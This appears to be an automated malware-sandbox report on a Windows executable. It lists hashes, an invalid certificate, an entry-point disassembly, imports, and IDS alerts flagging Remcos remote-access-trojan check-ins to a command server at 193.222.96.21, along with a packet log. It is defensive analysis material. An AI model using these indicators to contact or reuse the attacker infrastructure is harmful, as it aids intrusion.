SSDEEP: | 12288:P/1iPIsV0cQPysVHoPftGlGlLjxVllYwrJOu8yR9OK8V9Uiyw0Fk:FiPI+QPyeHoXbdZlFYFQs9PX |
TLSH: | A0E4F146BB088106D7821B339963C0F24F769C895EF4861F22E47E6B3EFA9977D4D106 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@ |
Icon Hash: | 1f3178f0e871338e |
Entrypoint: | 0x4032a0 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x57017AB6 [Sun Apr 3 20:19:02 2016 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | e2a592076b17ef8bfb48b7e03965a3fc |
Signature Valid: | false |
Signature Issuer: | E=Forstenelse@Stooled.Su, O=hospodar, OU="Magtfaktorer Anglofile aandelse ", CN=hospodar, L=Marseille, S=Provence-Alpes-C\xf4te d'Azur, C=FR |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | 2CADC40D9D42F6FD9E0D0AAB07A9D13B |
Thumbprint SHA-1: | 96C90AA6D8C1235F6F31E252D36927A9A9E11F11 |
Thumbprint SHA-256: | DE8A5B9BFED5A51F41C0D681E8E25C7E82592DA04AD66A649401456634E75801 |
Serial: | 16EF21813709A4D1A2E870187B56536BFE029FB6 |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push esi |
push edi |
push 00000020h |
pop edi |
xor ebx, ebx |
push 00008001h |
mov dword ptr [esp+14h], ebx |
mov dword ptr [esp+10h], 0040A2E0h |
mov dword ptr [esp+1Ch], ebx |
call dword ptr [004080B0h] |
call dword ptr [004080ACh] |
cmp ax, 00000006h |
je 00007F0108F23ED3h |
push ebx |
call 00007F0108F27014h |
cmp eax, ebx |
je 00007F0108F23EC9h |
push 00000C00h |
call eax |
mov esi, 004082B8h |
push esi |
call 00007F0108F26F8Eh |
push esi |
call dword ptr [0040815Ch] |
lea esi, dword ptr [esi+eax+01h] |
cmp byte ptr [esi], 00000000h |
jne 00007F0108F23EACh |
push ebp |
push 00000009h |
call 00007F0108F26FE6h |
push 00000007h |
call 00007F0108F26FDFh |
mov dword ptr [00434EE4h], eax |
call dword ptr [0040803Ch] |
push ebx |
call dword ptr [004082A4h] |
mov dword ptr [00434F98h], eax |
push ebx |
lea eax, dword ptr [esp+34h] |
push 000002B4h |
push eax |
push ebx |
push 0042B208h |
call dword ptr [00408188h] |
push 0040A2C8h |
push 00433EE0h |
call 00007F0108F26BC8h |
call dword ptr [004080A8h] |
mov ebp, 0043F000h |
push eax |
push ebp |
call 00007F0108F26BB6h |
push ebx |
call dword ptr [00408174h] |
add word ptr [eax], 0000h |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5b000 | 0x30cd0 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xaa738 | 0x18a8 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b4 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x637b | 0x6400 | 967d0e18ece4b8dcc63ec9d544660136 | False | 0.671484375 | data | 6.484796945043301 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x14b0 | 0x1600 | d6b0bc2db2de2a3dd996fda6539cef0e | False | 0.4401633522727273 | data | 5.033673390997287 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xa000 | 0x2afd8 | 0x600 | 2aa587c909999ca52be17d0f1ffbd186 | False | 0.5188802083333334 | data | 4.039551377217298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x35000 | 0x26000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x5b000 | 0x30cd0 | 0x30e00 | e46965cf3ebd9f23f9410b884f3063b2 | False | 0.4260060342071611 | data | 4.835872377247007 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x5b388 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.24849165976576362 |
RT_ICON | 0x6bbb0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.31387954593231027 |
RT_ICON | 0x75058 | 0x87f4 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9952591656131479 |
RT_ICON | 0x7d850 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.33622920517560073 |
RT_ICON | 0x82cd8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.32646433632498817 |
RT_ICON | 0x86f00 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.399896265560166 |
RT_ICON | 0x894a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4329268292682927 |
RT_ICON | 0x8a550 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5180327868852459 |
RT_ICON | 0x8aed8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5833333333333334 |
RT_DIALOG | 0x8b340 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x8b440 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x8b560 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x8b628 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x8b688 | 0x84 | data | English | United States | 0.7348484848484849 |
RT_VERSION | 0x8b710 | 0x27c | data | English | United States | 0.5062893081761006 |
RT_MANIFEST | 0x8b990 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384 |
DLL | Import |
---|---|
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/19/24-19:21:31.428672 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49718 | 29871 | 192.168.2.5 | 193.222.96.21 |
04/19/24-19:21:31.654705 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 29871 | 49718 | 193.222.96.21 | 192.168.2.5 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 19, 2024 19:21:29.486965895 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:29.487004042 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:29.487087965 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:29.498630047 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:29.498645067 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:29.727618933 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:29.727720976 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:29.784009933 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:29.784032106 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:29.784953117 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:29.785419941 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:29.787888050 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:29.832115889 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.000576973 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.000644922 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.000710011 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.000711918 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.000730038 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.000756979 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.000809908 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.000823021 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.000832081 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.000874996 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.000883102 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.000922918 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.000946045 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.000952959 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.000978947 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.001034975 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.001327991 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.001389980 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.001400948 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.001452923 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.001460075 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.001543999 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.001593113 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.001594067 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.001606941 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.001636982 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.001662016 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.001667976 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.001733065 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.001739025 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.001779079 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.002675056 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.002775908 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.002821922 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.002829075 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.002837896 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.002860069 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.002895117 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.002901077 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.002968073 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.002974033 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.003041029 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.003256083 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.003341913 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.003385067 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.003391981 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.003429890 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.003431082 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.003444910 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.003474951 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.003510952 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.004095078 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.004179955 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.004220963 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.004237890 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.004245043 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.004271030 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.004290104 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.004295111 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.004340887 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.004347086 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.005043983 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.005089045 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.005103111 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.005109072 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.005131960 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.005155087 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.005158901 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.005203009 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.005208969 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.005863905 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.005918026 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.005920887 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.005932093 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.005960941 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.005981922 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.005983114 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.006002903 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.006042004 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.006073952 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.105282068 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.105375051 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.106091976 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.106156111 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.106170893 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.106180906 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.106209040 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.106240988 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.106249094 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.106268883 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.106298923 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.106309891 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.106328011 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.106405973 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.107108116 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.107171059 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.107175112 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.107187033 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.107218027 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.107245922 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.107894897 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.108006001 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.108489037 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.108531952 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.108602047 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.108609915 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.108663082 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.109339952 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.109412909 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.109426975 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.109488010 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.110292912 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.110394001 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.110429049 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.110480070 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.111207008 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.111287117 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.111300945 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.111306906 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.111334085 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.111370087 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.153511047 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.153614998 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.209940910 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.210016012 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.210582972 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.210650921 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.210653067 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.210668087 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.210700989 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.210728884 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.211132050 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.211195946 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.211651087 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.211716890 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.211827040 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.211882114 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.212658882 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.212726116 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.212822914 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.212877035 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.212908983 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.212961912 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.213829994 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.213887930 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.214596033 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.214668989 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.214700937 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.214765072 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.215640068 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.215708017 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
Apr 19, 2024 19:21:30.215748072 CEST | 443 | 49717 | 172.67.191.112 | 192.168.2.5 |
Apr 19, 2024 19:21:30.215821028 CEST | 49717 | 443 | 192.168.2.5 | 172.67.191.112 |
